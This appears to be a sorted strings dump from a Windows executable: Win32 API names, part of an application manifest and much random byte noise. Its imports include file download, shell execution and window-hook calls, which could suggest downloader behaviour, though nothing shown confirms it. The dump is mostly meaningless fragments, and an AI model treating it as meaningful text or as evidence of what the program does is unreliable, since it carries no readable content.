QdK_T0={
Qdpw53)
=%=*=/=Q=e=
#Q^G[8
q!q8t}
q}%U2dC
?qvocm#
RaiseException
.rdata
ReadFile
RealizePalette
RectVisible
RedrawWindow
r\EDvaJ
RegCloseKey
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
ReleaseCapture
ReleaseDC
.relo2
RemoveMenu
RemovePropA
        <requestedExecutionLevel
      <requestedPrivileges>
        </requestedPrivileges>
ResetEvent
RestoreDC
RfJUQg
R<j6Ed
>R?_?j?y?
 r;#R[l
RtlUnwind
@ru`nd?
;r;v;z;~;
{rYhcf
 RyJ<A
]~S	1-=
s7dyUqE>
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SaveDC
@s&cAn-
ScreenToClient
ScrollWindow
    </security>
    <security>
_sEDp]
SelectObject
SelectPalette
SendMessageA
SetActiveWindow
SetBkColor
SetBkMode
SetBrushOrgEx
SetCapture
SetClassLongA
SetCursor
SetDIBColorTable
SetEndOfFile
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetMenu
SetMenuItemInfoA
SetParent
SetPixel
SetPropA
SetRect
SetROP2
SetScrollInfo
SetScrollPos
SetScrollRange
SetStretchBltMode
SetTextColor
SetThreadLocale
SetTimer
SetViewportOrgEx
SetWindowLongA
SetWindowOrgEx
SetWindowPlacement
SetWindowPos
SetWindowsHookExA
SetWindowTextA
s]FFs]F
SFH#Mc
s]F s]F
sH #B6
shell32.dll
ShellExecuteA
SHFolder.dll
SHGetFolderPathA
ShowCursor
ShowOwnedPopups
ShowScrollBar
ShowWindow
SizeofResource
sJs]L2s
	s`NbyeO
sS"pwW$
StretchBlt
< =S=u=
SUVWj"j
SysAllocStringLen
SysFreeString
SysReAllocStringLen
SystemParametersInfoA
sz_?,c
:sZk*8
|sZq&k
t)7 +X
tAd+	6Rz
tDffff`ww
<T=\=d=l=t=|=
TEq)aa
tFdfpxh
This program must be run under Win32
t^Hw{fQ
t^Hx{fQ
TlsGetValue
TlsSetValue
=<T/M$
Tn#uD,
 tq1ER
TrackPopupMenu
TranslateMDISysAccel
TranslateMessage
t;R\e|p
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
|tt'Eq
t$(WVj
tx"7Ms
t%yON"y
        type="win32"
&){u00"}
u}}0hJd
?U?]?c?o?w?
UE_[Ic}t
UEvF.I
UEvJ"Q
:*:U:g:
          uiAccess="false"/>
uLar	CE
UnhandledExceptionFilter
UnhookWindowsHookEx
u.(-no
UnrealizeObject
UnregisterClassA
UpdateWindow
URLDownloadToFileA
URLMON.DLL
user32.dll
-uw2ZN/
|v(:$(
V@_^][
Va>88dT[2
VariantChangeType
VariantClear
VariantCopy
VariantInit
:.:V:b:w:
+vCKXRiK[
VC)pfT<
<V<d<r<
VerQueryValueA
        version="6.0.0.0"
version.dll
%/VI\/
VirtualAlloc
VirtualFree
VirtualQuery
Vp@1;[2x
VRh}lI
VRPQh 
VRPQj 
vS0GkT
vU"fxW#
vU"sxW#suU"
w2f1g9=
W7ALG;
WaitForSingleObject
WaitMessage
w{D/J11
\	 WH<W
_WHz@:
WideCharToMultiByte
WindowFromPoint
WinHelpA
=w"jYQb>
W =.	k
WK$)Z}
=/=>=W=r=
WriteFile
!wrJ*I
wwwwwv
wwwwww
wwwwwww
wwwwwwww
wwwwwwwww
@wwwwwwwww
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwx
wwwwwwwwwwxo
wwwwwwwwx
wwwwwwwwxo
wwwwwwxo
wwwwwxo
wwwwxo
wx}DGJ11
< ='=]=x>
<X=^=	?
]&=?X$5
X7A~AK
x[:7]+D
xcLwzeO
?xk07[
XM\>{@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
X*p>p(
XUC3Lc
xV#,>@
}xxxx}
,#Xzv!T$
Y:$06#
y8	1*s
	YBD';M
yB|O5N
!:yCs@
_'YnkD
Yz>eq[mg
<@<{<z=
>$>]>z>
Z0$Li_#
;z<2=v=
=>=Z=a=
za2C4s
=Z?b?m?
=Z=b=q=y=
;&;Z;^;d;h;m;t;z;
;(;:;Z;l;u;
#!	Zm)
]zO:CF
ZOjkQ`
Z}p:}0
zr!`m3v
(!zUSr&,